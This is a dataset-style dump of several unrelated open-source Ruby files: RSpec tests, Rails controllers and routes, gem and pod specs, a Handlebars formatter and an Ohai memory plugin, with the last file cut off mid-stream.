hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
1c27640c3b3832192686665a5f5385e151b7f38a | 4,113 | require 'spec_helper'
RSpec.describe MXNet::Optimizer do
describe '.create' do
it 'does not accept a class' do
expect {
MXNet::Optimizer.create(MXNet::Optimizer::SGD)
}.to raise_error(ArgumentError)
end
it 'accepts an instance' do
opt = MXNet::Optimizer.create(MXNet::Optimizer::SGD.new)
expect(opt).to be_a(MXNet::Optimizer::SGD)
end
it 'accepts a string' do
opt = MXNet::Optimizer.create('sgd')
expect(opt).to be_a(MXNet::Optimizer::SGD)
end
it 'accepts a symbol' do
opt = MXNet::Optimizer.create(:sgd)
expect(opt).to be_a(MXNet::Optimizer::SGD)
end
end
end
RSpec.describe MXNet::Optimizer::Base do
describe '#learning_rate' do
it 'is changed by #learning_rate=' do
o1 = MXNet::Optimizer::Base.new(learning_rate: 0.01)
o1.learning_rate = 0.2
expect(o1.learning_rate).to eq(0.2)
end
it 'is affected by lr_scheduler' do
lr_s = MXNet::LRScheduler::FactorScheduler.new(step: 1)
o2 = MXNet::Optimizer::Base.new(lr_scheduler: lr_s, learning_rate: 0.3)
expect(o2.learning_rate).to eq(0.3)
o2.lr_scheduler.base_lr = 0.4
expect(o2.learning_rate).to eq(0.4)
end
end
describe '#learning_rate=' do
it 'raises RuntimeError if lr_scheduler is given' do
lr_s = MXNet::LRScheduler::FactorScheduler.new(step: 1)
o = MXNet::Optimizer::Base.new(lr_scheduler: lr_s, learning_rate: 0.3)
expect { o.learning_rate = 0.5 }.to raise_error(RuntimeError)
end
end
describe '#lr_mult' do
specify do
o = MXNet::Optimizer::Base.new
end
end
describe '#lr_mult=' do
specify do
o = MXNet::Optimizer::Base.new()
end
end
describe '#wd_mult=' do
end
describe 'lr_mult and wd_mult' do
xspecify do
data = MXNet::Symbol.var(:data)
bias = MXNet::Symbol.var(:fc1_bias, lr_mult: 1.0)
fc1 = MXNet::Symbol.FullyConnected(data: data, bias: bias, name: :fc1, num_hidden: 10, lr_mult: 0)
fc2 = MXNet::Symbol.FullyConnected(data: fc1, name: :fc2, num_hidden: 10, wd_mult: 0.5)
mod = MXNet::Module.new(symbol: fc2, label_names: nil, context: MXNet.default_context)
mod.bind(data_shapes: [[:data, [5, 10]]])
mod.init_params(init: MXNet::Init::Uniform.new(1.0))
mod.init_optimizer(optimizer_params: {learning_rate: 1.0})
args1, _ = mod.get_params
args1.transform_values!(&:to_narray)
mod.forward(MXNet::IO::DataBatch.new(data: [MXNet::Random::Uniform.new(low: -1.0, high: 1.0, shape: [5, 10])], label: nil), is_train: true)
mod.backward(mod.get_outputs)
mod.update
args2, _ = mod.get_params
args2.transform_values!(&:to_narray)
expect(mod.optimizer.lr_mult).to include(fc1_bias: 1.0, fc1_weight: 0.0)
expect(mod.optimizer.wd_mult).to include(fc2_bias: 0.5, fc2_weight: 0.5, fc1_bias: 0.0)
expect((args1[:fc1_weight] - args2[:fc1_weight]).abs.max).to be <= 1e-10
expect((args1[:fc1_bias] - args2[:fc1_bias]).abs.max).not_to be <= 1e-1
expect((args1[:fc2_weight] - args2[:fc2_weight]).abs.max).not_to be <= 1e-1
end
end
end
RSpec.describe MXNet::Optimizer::SGD do
context 'with lr_scheduler' do
specify do
opt = MXNet::Optimizer::SGD.new(
momentum: 0.9,
learning_rate: 0.1,
lr_scheduler: MXNet::LRScheduler::FactorScheduler.new(step: 10, factor: 0.2)
)
expect(opt.learning_rate).to eq(0.1)
expect { opt.learning_rate = 0.02 }.to raise_error
end
end
describe '#update' do
let(:optimizer) do
MXNet::Optimizer::SGD.new(learning_rate: 0.1)
end
it 'updates the weight' do
weight = MXNet::NDArray.array([1])
gradient = MXNet::NDArray.array([0.5])
optimizer.update(0, weight, gradient, nil)
expect(weight.as_scalar).to be_within(0.01).of(0.95)
end
end
end
RSpec.xdescribe 'Sparse SGD' # TODO:
RSpec.xdescribe 'FTML' # TODO:
RSpec.xdescribe 'ADAM' # TODO:
RSpec.xdescribe 'Signum' # TODO:
RSpec.xdescribe 'RMSProp' # TODO:
RSpec.xdescribe 'Ftrl' # TODO:
RSpec.xdescribe 'NADAM' # TODO:
| 32.132813 | 145 | 0.653781 |
bf87d5f1d455f3e8ec3c3327b462db7eaae880a4 | 1,874 | # encoding: utf-8
# This file is autogenerated. Do not edit it manually.
# If you want change the content of this file, edit
#
# /spec/fixtures/responses/whois.co.ug/status_registered.expected
#
# and regenerate the tests with the following rake task
#
# $ rake genspec:parsers
#
require 'spec_helper'
require 'whois/record/parser/whois.co.ug.rb'
describe Whois::Record::Parser::WhoisCoUg, "status_registered.expected" do
before(:each) do
file = fixture("responses", "whois.co.ug/status_registered.txt")
part = Whois::Record::Part.new(:body => File.read(file))
@parser = klass.new(part)
end
context "#status" do
it do
@parser.status.should == :registered
end
end
context "#available?" do
it do
@parser.available?.should == false
end
end
context "#registered?" do
it do
@parser.registered?.should == true
end
end
context "#created_on" do
it do
@parser.created_on.should be_a(Time)
@parser.created_on.should == Time.parse("2001-04-02 00:00:00")
end
end
context "#updated_on" do
it do
@parser.updated_on.should be_a(Time)
@parser.updated_on.should == Time.parse("2009-11-10 14:06:58 UTC")
end
end
context "#expires_on" do
it do
@parser.expires_on.should be_a(Time)
@parser.expires_on.should == Time.parse("2018-04-07 00:00:00")
end
end
context "#nameservers" do
it do
@parser.nameservers.should be_a(Array)
@parser.nameservers.should have(3).items
@parser.nameservers[0].should be_a(_nameserver)
@parser.nameservers[0].name.should == "ns1.cfi.co.ug"
@parser.nameservers[1].should be_a(_nameserver)
@parser.nameservers[1].name.should == "ns2.cfi.co.ug"
@parser.nameservers[2].should be_a(_nameserver)
@parser.nameservers[2].name.should == "ns3.cfi.co.ug"
end
end
end
| 26.771429 | 74 | 0.667556 |
5d8d666ae26ca1a83c599f430ee935bde41eebb8 | 456 | class AircraftsController < ApplicationController
def index
aircrafts = Aircraft.all
if aircrafts
render json: AircraftSerializer.new(aircrafts)
else
render json: {message: 'No aircrafts found'}
end
end
def show
aircraft = Aircraft.find_by(id: params[:id])
if aircraft
render json: AircraftSerializer.new(aircraft)
else
render json: {message: 'No aircraft found with that id'}
end
end
end
| 22.8 | 62 | 0.682018 |
bf0ee566117b0e8f9fcb8ab0d48972aac5eed682 | 1,253 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads/v3/enums/search_engine_results_page_type.proto
require 'google/protobuf'
require 'google/api/annotations_pb'
Google::Protobuf::DescriptorPool.generated_pool.build do
add_file("google/ads/googleads/v3/enums/search_engine_results_page_type.proto", :syntax => :proto3) do
add_message "google.ads.googleads.v3.enums.SearchEngineResultsPageTypeEnum" do
end
add_enum "google.ads.googleads.v3.enums.SearchEngineResultsPageTypeEnum.SearchEngineResultsPageType" do
value :UNSPECIFIED, 0
value :UNKNOWN, 1
value :ADS_ONLY, 2
value :ORGANIC_ONLY, 3
value :ADS_AND_ORGANIC, 4
end
end
end
module Google
module Ads
module GoogleAds
module V3
module Enums
SearchEngineResultsPageTypeEnum = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v3.enums.SearchEngineResultsPageTypeEnum").msgclass
SearchEngineResultsPageTypeEnum::SearchEngineResultsPageType = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v3.enums.SearchEngineResultsPageTypeEnum.SearchEngineResultsPageType").enummodule
end
end
end
end
end
| 37.969697 | 233 | 0.769354 |
f7edac462ef3caa451dde5b90c0c32592abcc9fb | 439 | ENV['RAILS_ENV'] ||= 'test'
require_relative "../config/environment"
require "rails/test_help"
require "minitest/reporters"
Minitest::Reporters.use!
class ActiveSupport::TestCase
# Run tests in parallel with specified workers
parallelize(workers: :number_of_processors)
# Setup all fixtures in test/fixtures/*.yml for all tests in alphabetical order.
fixtures :all
# Add more helper methods to be used by all tests here...
end
| 29.266667 | 82 | 0.763098 |
ed35f13162e33318e910f379353d24c067893e2b | 46 | module MethodFallback
VERSION = '0.1.2'
end
| 11.5 | 21 | 0.717391 |
261531041be37c56e007c4be31d7f9c037858742 | 1,198 |
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'gbeacon/version'
Gem::Specification.new do |spec|
spec.name = 'gbeacon'
spec.version = Gbeacon::VERSION
spec.authors = ['Marlon Henry Schweigert']
spec.email = ['[email protected]']
spec.summary = 'Grafana beacon'
spec.description = 'Grafana beacon'
spec.homepage = 'http://www.github.com/schweigert/grafana-beacon'
spec.license = 'MIT'
# Specify which files should be added to the gem when it is released.
# The `git ls-files -z` loads the files in the RubyGem that have been added into git.
spec.files = Dir.chdir(File.expand_path('..', __FILE__)) do
`git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
end
spec.bindir = 'cmd'
spec.executables = ['gbeacon.rb']
spec.require_paths = ['lib']
spec.add_dependency 'graphite-api', '~> 0.1.6'
spec.add_dependency 'usagewatch_ext', '~> 0.2.1'
spec.add_development_dependency 'bundler', '~> 1.16'
spec.add_development_dependency 'rake', '~> 10.0'
spec.add_development_dependency 'rspec', '~> 3.0'
end
| 36.30303 | 87 | 0.653589 |
91b230311343c0b682d61439f0275cd33e092979 | 420 | require "rails_helper"
feature "Handling Forbidden responses from the backend", type: :feature do
let(:forbidden_page) { PageObjects::Page::Forbidden.new }
before do
signed_in_user
stub_api_v2_request("/recruitment_cycles/#{Settings.current_cycle}", "", :get, 403)
end
it "Renders the forbidden page" do
visit "/organisations/A0/"
expect(forbidden_page.forbidden_text).to be_visible
end
end
| 26.25 | 87 | 0.740476 |
e2860ac7b07c8e6a8b91a87e37605dbcf2c569fa | 1,293 | cask 'amethyst' do
if MacOS.version <= :mavericks
version '0.9.10'
sha256 '82adf42ce6031ab59a3072e607788e73f594ad5f21c7118aabc6c5dafe3d0b47'
url "https://ianyh.com/amethyst/versions/Amethyst-#{version}.zip"
elsif MacOS.version <= :el_capitan
version '0.10.1'
sha256 '9fd1ac2cfb8159b2945a4482046ee6d365353df617f4edbabc4e8cadc448c1e7'
url "https://ianyh.com/amethyst/versions/Amethyst-#{version}.zip"
else
version '0.13.0'
sha256 '18fd9d2f6da33fd854668f315ee753ebb819219dd4f3b67387a1653252acbd30'
# github.com/ianyh/Amethyst was verified as official when first introduced to the cask
url "https://github.com/ianyh/Amethyst/releases/download/v#{version}/Amethyst.zip"
end
appcast 'https://ianyh.com/amethyst/appcast.xml'
name 'Amethyst'
homepage 'https://ianyh.com/amethyst/'
auto_updates true
app 'Amethyst.app'
uninstall login_item: 'Amethyst'
zap trash: [
'~/Library/Caches/com.amethyst.Amethyst',
'~/Library/Preferences/com.amethyst.Amethyst.plist',
'~/Library/Cookies/com.amethyst.Amethyst.binarycookies',
'~/Library/Application Support/com.apple.sharedfilelist/com.apple.LSSharedFileList.ApplicationRecentDocuments/com.amethyst.amethyst.sfl*',
]
end
| 38.029412 | 153 | 0.723898 |
61a604b954f773ae85d8287e7dee54f51df14a9a | 7,556 | require 'sidekiq/web'
Gitlab::Application.routes.draw do
#
# Search
#
get 'search' => "search#show"
# API
require 'api'
Gitlab::API.logger Rails.logger
mount Gitlab::API => '/api'
constraint = lambda { |request| request.env["warden"].authenticate? and request.env['warden'].user.admin? }
constraints constraint do
mount Sidekiq::Web, at: "/admin/sidekiq", as: :sidekiq
end
# Enable Grack support
mount Grack::Bundle.new({
git_path: Gitlab.config.git.bin_path,
project_root: Gitlab.config.gitlab_shell.repos_path,
upload_pack: Gitlab.config.gitlab_shell.upload_pack,
receive_pack: Gitlab.config.gitlab_shell.receive_pack
}), at: '/', constraints: lambda { |request| /[-\/\w\.]+\.git\//.match(request.path_info) }
#
# Help
#
get 'help' => 'help#index'
get 'help/api' => 'help#api'
get 'help/markdown' => 'help#markdown'
get 'help/permissions' => 'help#permissions'
get 'help/public_access' => 'help#public_access'
get 'help/raketasks' => 'help#raketasks'
get 'help/ssh' => 'help#ssh'
get 'help/system_hooks' => 'help#system_hooks'
get 'help/web_hooks' => 'help#web_hooks'
get 'help/workflow' => 'help#workflow'
#
# Public namespace
#
namespace :public do
resources :projects, only: [:index]
root to: "projects#index"
end
#
# Attachments serving
#
get 'files/:type/:id/:filename' => 'files#download', constraints: { id: /\d+/, type: /[a-z]+/, filename: /.+/ }
#
# Admin Area
#
namespace :admin do
resources :users, constraints: { id: /[a-zA-Z.\/0-9_\-]+/ } do
member do
put :team_update
put :block
put :unblock
end
end
resources :groups, constraints: { id: /[^\/]+/ } do
member do
put :project_update
put :project_teams_update
delete :remove_project
end
end
resources :teams, constraints: { id: /[^\/]+/ } do
scope module: :teams do
resources :members, only: [:edit, :update, :destroy, :new, :create]
resources :projects, only: [:edit, :update, :destroy, :new, :create], constraints: { id: /[a-zA-Z.\/0-9_\-]+/ }
end
end
resources :hooks, only: [:index, :create, :destroy] do
get :test
end
resource :logs, only: [:show]
resource :resque, controller: 'resque', only: [:show]
resources :projects, constraints: { id: /[a-zA-Z.\/0-9_\-]+/ }, only: [:index, :show] do
scope module: :projects, constraints: { id: /[a-zA-Z.\/0-9_\-]+/ } do
resources :members, only: [:edit, :update, :destroy]
end
end
root to: "dashboard#index"
end
get "errors/githost"
#
# Profile Area
#
resource :profile, only: [:show, :update] do
member do
get :account
get :history
get :token
get :design
put :update_password
put :reset_private_token
put :update_username
end
resource :notifications
end
resources :keys
match "/u/:username" => "users#show", as: :user, constraints: { username: /.*/ }
#
# Dashboard Area
#
resource :dashboard, controller: "dashboard" do
member do
get :projects
get :issues
get :merge_requests
end
end
#
# Groups Area
#
resources :groups, constraints: {id: /(?:[^.]|\.(?!atom$))+/, format: /atom/} do
member do
get :issues
get :merge_requests
get :search
get :people
post :team_members
end
end
#
# Teams Area
#
resources :teams, constraints: {id: /(?:[^.]|\.(?!atom$))+/, format: /atom/} do
member do
get :issues
get :merge_requests
end
scope module: :teams do
resources :members, only: [:index, :new, :create, :edit, :update, :destroy]
resources :projects, only: [:index, :new, :create, :edit, :update, :destroy], constraints: { id: /[a-zA-Z.0-9_\-\/]+/ }
end
end
resources :projects, constraints: { id: /[^\/]+/ }, only: [:new, :create]
devise_for :users, controllers: { omniauth_callbacks: :omniauth_callbacks, registrations: :registrations }
#
# Project Area
#
resources :projects, constraints: { id: /(?:[a-zA-Z.0-9_\-]+\/)?[a-zA-Z.0-9_\-]+/ }, except: [:new, :create, :index], path: "/" do
member do
put :transfer
end
resources :blob, only: [:show], constraints: {id: /.+/}
resources :tree, only: [:show], constraints: {id: /.+/, format: /(html|js)/ }
resources :edit_tree, only: [:show, :update], constraints: {id: /.+/}, path: 'edit'
resources :commit, only: [:show], constraints: {id: /[[:alnum:]]{6,40}/}
resources :commits, only: [:show], constraints: {id: /(?:[^.]|\.(?!atom$))+/, format: /atom/}
resources :compare, only: [:index, :create]
resources :blame, only: [:show], constraints: {id: /.+/}
resources :graph, only: [:show], constraints: {id: /(?:[^.]|\.(?!json$))+/, format: /json/}
match "/compare/:from...:to" => "compare#show", as: "compare",
:via => [:get, :post], constraints: {from: /.+/, to: /.+/}
resources :wikis, only: [:show, :edit, :destroy, :create] do
collection do
get :pages
put ':id' => 'wikis#update'
get :git_access
end
member do
get "history"
end
end
resource :wall, only: [:show] do
member do
get 'notes'
end
end
resource :repository do
member do
get "branches"
get "tags"
get "stats"
get "archive"
end
end
resources :services, constraints: { id: /[^\/]+/ }, only: [:index, :edit, :update] do
member do
get :test
end
end
resources :deploy_keys
resources :protected_branches, only: [:index, :create, :destroy]
resources :refs, only: [] do
collection do
get "switch"
end
member do
# tree viewer logs
get "logs_tree", constraints: { id: /[a-zA-Z.\/0-9_\-]+/ }
get "logs_tree/:path" => "refs#logs_tree",
as: :logs_file,
constraints: {
id: /[a-zA-Z.0-9\/_\-]+/,
path: /.*/
}
end
end
resources :merge_requests, constraints: {id: /\d+/}, except: [:destroy] do
member do
get :diffs
get :automerge
get :automerge_check
get :ci_status
end
collection do
get :branch_from
get :branch_to
end
end
resources :snippets do
member do
get "raw"
end
end
resources :hooks, only: [:index, :create, :destroy] do
member do
get :test
end
end
resources :team, controller: 'team_members', only: [:index]
resources :milestones, except: [:destroy]
resources :labels, only: [:index]
resources :issues, except: [:destroy] do
collection do
post :sort
post :bulk_update
get :search
end
end
resources :team_members do
collection do
# Used for import team
# from another project
get :import
post :apply_import
end
end
scope module: :projects do
resources :teams, only: [] do
collection do
get :available
post :assign
end
member do
delete :resign
end
end
end
resources :notes, only: [:index, :create, :destroy] do
collection do
post :preview
end
end
end
root to: "dashboard#show"
end
| 24.77377 | 132 | 0.560349 |
1c2444e839beaf7865c3e4fad27fcc27aff7a511 | 2,515 | Rails.application.routes.draw do
resource :profile, only: [:show, :edit, :update]
resources :donations, only: [:edit, :update] do
resource :confirmation, only: [:create, :destroy, :update]
end
resource :location, only: [:update]
resources :pre_registrations, only: [:create]
resources :zones, only: [] do
resources :registrations, only: [:create, :new]
resources :subscriptions, only: [:create, :new]
end
resources :passwords, controller: "clearance/passwords", only: [:create, :new]
resource :session, controller: "clearance/sessions", only: [:create]
resources :users, controller: "users", only: [:create] do
resource :password,
controller: "clearance/passwords",
only: [:create, :edit, :update]
end
get "/sign_in" => "clearance/sessions#new", as: "sign_in"
delete "/sign_out" => "clearance/sessions#destroy", as: "sign_out"
get "/pages/*id" => 'pages#show', as: :page, format: false
constraints Clearance::Constraints::SignedIn.new(&:regional_admin?) do
resources :cyclist_invitations, only: [:new, :create, :show]
resources :donors, only: [:show]
resources :users, only: [:index, :destroy] do
resource :promotion, only: [:create, :destroy]
end
resources :zones, only: [:create, :index, :new, :show, :edit, :update] do
resources(
:scheduled_pickups,
path: :donations,
only: [:edit, :show, :new, :create, :update],
)
end
resources :regions, only: [:create, :destroy, :index, :new, :show] do
resources(
:zones,
only: [:create, :destroy, :new],
controller: :region_zones
)
end
resources :region_admins, only: [:new, :create, :destroy]
get "/" => redirect("/zones")
end
constraints Clearance::Constraints::SignedIn.new(&:staff?) do
resources :donations, only: [:show] do
resource :pickup, only: [:update, :destroy]
end
resources :subscriptions, only: [:index]
resources :zones, only: [] do
resources(
:scheduled_pickups,
path: :donations,
only: [],
) do
resource :checklist, only: [:show], controller: :pickup_checklists
end
end
end
constraints Clearance::Constraints::SignedIn.new(&:cyclist?) do
get "/" => "latest_pickup_checklists#show"
end
constraints Clearance::Constraints::SignedIn.new do
get "/" => redirect("/profile")
end
constraints Clearance::Constraints::SignedOut.new do
root to: "marketing#index"
end
end
| 29.940476 | 80 | 0.638569 |
030efd6cfd21e4efee8438a783d5b2ff6bc07fce | 2,584 | Pod::Spec.new do |s|
s.name = "MatrixSDK"
s.version = "0.22.5"
s.summary = "The iOS SDK to build apps compatible with Matrix (https://www.matrix.org)"
s.description = <<-DESC
Matrix is a new open standard for interoperable Instant Messaging and VoIP, providing pragmatic HTTP APIs and open source reference implementations for creating and running your own real-time communication infrastructure.
Our hope is to make VoIP/IM as universal and interoperable as email.
DESC
s.homepage = "https://www.matrix.org"
s.license = { :type => "Apache License, Version 2.0", :file => "LICENSE" }
s.author = { "matrix.org" => "[email protected]" }
s.social_media_url = "http://twitter.com/matrixdotorg"
s.source = { :git => "https://github.com/matrix-org/matrix-ios-sdk.git", :tag => "v#{s.version}" }
s.requires_arc = true
s.swift_versions = ['5.1', '5.2']
s.ios.deployment_target = "10.0"
s.osx.deployment_target = "10.12"
s.default_subspec = 'Core'
s.subspec 'Core' do |ss|
ss.ios.deployment_target = "10.0"
ss.osx.deployment_target = "10.12"
ss.source_files = "MatrixSDK", "MatrixSDK/**/*.{h,m}", "MatrixSDK/**/*.{swift}"
ss.osx.exclude_files = "MatrixSDK/VoIP/MXiOSAudioOutputRoute*.swift"
ss.private_header_files = ['MatrixSDK/MatrixSDKSwiftHeader.h', "MatrixSDK/**/*_Private.h"]
ss.resources = "MatrixSDK/**/*.{xcdatamodeld}"
ss.frameworks = "CoreData"
ss.dependency 'AFNetworking', '~> 4.0.0'
ss.dependency 'GZIP', '~> 1.3.0'
ss.dependency 'SwiftyBeaver', '1.9.5'
# Requirements for e2e encryption
ss.dependency 'OLMKit', '~> 3.2.5'
ss.dependency 'Realm', '10.16.0'
ss.dependency 'libbase58', '~> 0.1.4'
end
s.subspec 'JingleCallStack' do |ss|
ss.ios.deployment_target = "11.0"
ss.source_files = "MatrixSDKExtensions/VoIP/Jingle/**/*.{h,m}"
ss.dependency 'MatrixSDK/Core'
# The Google WebRTC stack
# Note: it is disabled because its framework does not embed x86 build which
# prevents us from submitting the MatrixSDK pod
#ss.ios.dependency 'GoogleWebRTC', '~>1.1.21820'
# Use WebRTC framework included in Jitsi Meet SDK
ss.ios.dependency 'JitsiMeetSDK', ' 3.10.2'
# JitsiMeetSDK has not yet binaries for arm64 simulator
ss.pod_target_xcconfig = { 'EXCLUDED_ARCHS[sdk=iphonesimulator*]' => 'arm64' }
ss.user_target_xcconfig = { 'EXCLUDED_ARCHS[sdk=iphonesimulator*]' => 'arm64' }
end
end
| 36.394366 | 228 | 0.642028 |
5db05865ea57ec93f706e129309f5098e9421034 | 1,040 | # frozen_string_literal: true
require 'test_helper'
class UsersControllerTest < ActionDispatch::IntegrationTest
setup do
@user = users(:one)
end
test 'should get index' do
get users_url
assert_response :success
end
test 'should get new' do
get new_user_url
assert_response :success
end
test 'should create user' do
assert_difference('User.count') do
post users_url, params: { user: { email: @user.email, name: @user.name } }
end
assert_redirected_to user_url(User.last)
end
test 'should show user' do
get user_url(@user)
assert_response :success
end
test 'should get edit' do
get edit_user_url(@user)
assert_response :success
end
test 'should update user' do
patch user_url(@user), params: { user: { email: @user.email, name: @user.name } }
assert_redirected_to user_url(@user)
end
test 'should destroy user' do
assert_difference('User.count', -1) do
delete user_url(@user)
end
assert_redirected_to users_url
end
end
| 20.392157 | 85 | 0.688462 |
bb1929c00c1e655d4a70e3c227f62594d0b9a526 | 1,441 | # typed: false
require 'spec_helper'
require 'ddtrace/transport/io'
RSpec.describe Datadog::Transport::IO do
describe '.new' do
subject(:new_io) { described_class.new(out, encoder) }
let(:out) { instance_double(IO) }
let(:encoder) { instance_double(Datadog::Core::Encoding::Encoder) }
let(:client) { instance_double(Datadog::Transport::IO::Client) }
before do
expect(Datadog::Transport::IO::Client).to receive(:new)
.with(out, encoder)
.and_return(client)
end
it { is_expected.to be client }
end
describe '.default' do
let(:client) { instance_double(Datadog::Transport::IO::Client) }
context 'given no options' do
subject(:default) { described_class.default }
before do
expect(Datadog::Transport::IO::Client).to receive(:new)
.with($stdout, Datadog::Core::Encoding::JSONEncoder)
.and_return(client)
end
it { is_expected.to be client }
end
context 'given overrides' do
subject(:default) { described_class.default(options) }
let(:options) { { out: out, encoder: encoder } }
let(:out) { instance_double(IO) }
let(:encoder) { instance_double(Datadog::Core::Encoding::Encoder) }
before do
expect(Datadog::Transport::IO::Client).to receive(:new)
.with(out, encoder)
.and_return(client)
end
it { is_expected.to be client }
end
end
end
| 26.2 | 73 | 0.634976 |
bbb8a6d195e04caaf36ca47036435f40195d29bf | 6,696 | # Klue-Less DDD generator
module KDsl
module TemplateRendering
# https://api.rubyonrails.org/classes/ActiveSupport/Inflector.html#method-i-humanize
class HandlebarsFormatter
# ----------------------------------------------------------------------
# format symbols
# ----------------------------------------------------------------------
# TODO
def self.format_as(value, formats: [])
formats.each do |format|
value = format(value, format)
end
value
end
# TODO
def self.format(value, format = nil)
case format.to_s.to_sym
when :snake
return snake(value)
when :dashify, :dasherize
return dashify(value)
when :camel, :camelU, :camelUpper
return camel(value)
when :lamel, :camelL, :camelLower
return lamel(value)
when :titleize
return titleize(value)
when :humanize
return humanize(value)
when :constant, :constantize
return constantize(value)
when :pluralize
return pluralize(value)
when :slash, :slash_forward, :forward_slash
return slash(value)
when :slash_back, :back_slash, :backward_slash, :slash_backward
return back_slash(value)
when :double_colon, :namespace
return double_colon(value)
end
value
end
def self.snake(value)
value = value.to_s
value.parameterize.underscore
end
def self.slash(value)
value = value.to_s
value.parameterize(preserve_case: true).dasherize.gsub('-', '/')
end
def self.back_slash(value)
value = value.to_s
value.parameterize(preserve_case: true).dasherize.gsub('-', '\\')
end
def self.double_colon(value)
value = value.to_s
value.parameterize(preserve_case: true).dasherize.gsub('-', '::')
end
def self.dashify(value)
value = value.to_s
value.parameterize.dasherize
end
def self.camel(value)
value = value.to_s
value.parameterize.underscore.camelize
end
def self.lamel(value)
value = value.to_s
value.parameterize.underscore.camelize(:lower)
end
def self.titleize(value)
value = value.to_s
value.parameterize.underscore.titleize
end
def self.humanize(value)
value = value.to_s
value.parameterize.underscore.humanize
end
def self.constantize(value)
value = value.to_s
snake(value).upcase
end
def self.pluralize(value)
value = value.to_s
value.pluralize
end
# ----------------------------------------------------------------------
# format symbols
# ----------------------------------------------------------------------
# default
def self.default(value, default_value)
# L.kv 'value', value
# L.kv 'default_value', default_value
out = value || default_value
end
# Pad Right
def self.padr(value, count = nil)
# L.kv 'value', value
# L.kv 'count', count
count = defined?(count) && count.is_a?(Integer) ? count : 30
value = '' if value.nil?
out = value.ljust(count)
end
# Pad Left
def self.padl(value, count = nil)
# L.kv 'value', value
# L.kv 'count', count
count = defined?(count) && count.is_a?(Integer) ? count : 30
value = '' if value.nil?
out = value.rjust(count)
end
# STRING CASE
# &
# STRING
def self.surround_if_value(value, prepend, append, format = :none)
# L.kv 'value', value
# L.kv 'prepend', prepend
# L.kv 'format', format
value.present? ? "#{prepend}#{format(value, format)}#{append}" : ''
end
# STRING CASE
# &
# STRING
# prepend_if_value - will prepend a prepend to a value if the value is not empty
def self.prepend_if_value(value, prepend, format = :none)
# L.kv 'value', value
# L.kv 'prepend', prepend
# L.kv 'format', format
value.present? ? "#{prepend}#{format(value, format)}" : ''
end
# append_if_value - will add a append to a value if the value is not empty
def self.append_if_value(value, append, format = :none)
# L.kv 'value', value
# L.kv 'default_value', default_value
value.present? ? "#{format(value, format)}#{append}" : ''
end
# STRING
# append_if_value - will add a append to a value if the value is not empty
def self.repeat(count, value = ' ')
# L.kv 'value', value
# L.kv 'count', count
value * count
end
# STRING (LINE_HASH LINE_DASH LINE_UNDERSCORE)
# hash
def self.hash(count = 1)
# L.kv 'count', count.class.name
# L.kv 'count', count
count = defined?(count) && count.is_a?(Integer) ? count : 1
'#' * count
end
# TEMPLATE
# curly_open
def self.curly_open(count = 1)
# L.kv 'count', count.class.name
# L.kv 'count', count
count = defined?(count) && count.is_a?(Integer) ? count : 1
'{' * count
end
# curly_close
def self.curly_close(count = 1)
# L.kv 'count', count.class.name
# L.kv 'count', count
count = defined?(count) && count.is_a?(Integer) ? count : 1
'}' * count
end
# ----------------------------------------------------------------------
# Logic helpers
# ----------------------------------------------------------------------
def self.or(lhs, rhs)
# L.kv 'lhs', lhs
# L.kv 'rhs', rhs
lhs || rhs
end
def self.and(lhs, rhs)
# L.kv 'lhs', lhs
# L.kv 'rhs', rhs
lhs && rhs
end
def self.eq(lhs, rhs)
# L.kv 'lhs', lhs
# L.kv 'rhs', rhs
lhs == rhs
end
def self.ne(lhs, rhs)
# L.kv 'lhs', lhs
# L.kv 'rhs', rhs
lhs != rhs
end
def self.lt(lhs, rhs)
# L.kv 'lhs', lhs
# L.kv 'rhs', rhs
lhs < rhs
end
def self.gt(lhs, rhs)
# L.kv 'lhs', lhs
# L.kv 'rhs', rhs
lhs > rhs
end
def self.lte(lhs, rhs)
# L.kv 'lhs', lhs
# L.kv 'rhs', rhs
lhs <= rhs
end
def self.gte(lhs, rhs)
# L.kv 'lhs', lhs
# L.kv 'rhs', rhs
lhs >= rhs
end
end
end
end
| 25.172932 | 88 | 0.497909 |
2878752636aa0d1b9f131c2dc8fd94dbe0d9fd5b | 2,412 | #
# Author:: Bryan McLellan ([email protected])
# Copyright:: Copyright (c) 2009 Bryan McLellan
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
Ohai.plugin(:Memory) do
provides "memory", "memory/swap"
collect_data(:dragonflybsd) do
memory Mash.new
memory[:swap] = Mash.new
# /usr/src/sys/sys/vmmeter.h
so = shell_out("sysctl -n vm.stats.vm.v_page_size")
memory[:page_size] = so.stdout.split($/)[0]
so = shell_out("sysctl -n vm.stats.vm.v_page_count")
memory[:page_count] = so.stdout.split($/)[0]
memory[:total] = memory[:page_size].to_i * memory[:page_count].to_i
so = shell_out("sysctl -n vm.stats.vm.v_free_count")
memory[:free] = memory[:page_size].to_i * so.stdout.split($/)[0].to_i
so = shell_out("sysctl -n vm.status.vm.v_active_count")
memory[:active] = memory[:page_size].to_i * so.stdout.split($/)[0].to_i
so = shell_out("sysctl -n vm.status.vm.v_inactive_count")
memory[:inactive] = memory[:page_size].to_i * so.stdout.split($/)[0].to_i
so = shell_out("sysctl -n vm.stats.vm.v_cache_count")
memory[:cache] = memory[:page_size].to_i * so.stdout.split($/)[0].to_i
so = shell_out("sysctl -n vm.stats.vm.v_wire_count")
memory[:wired] = memory[:page_size].to_i * so.stdout.split($/)[0].to_i
so = shell_out("sysctl -n vfs.bufspace")
memory[:buffers] = so.stdout.split($/)[0]
so = shell_out("swapinfo")
so.stdout.lines do |line|
# Device 1K-blocks Used Avail Capacity
# /dev/ad0s1b 253648 0 253648 0%
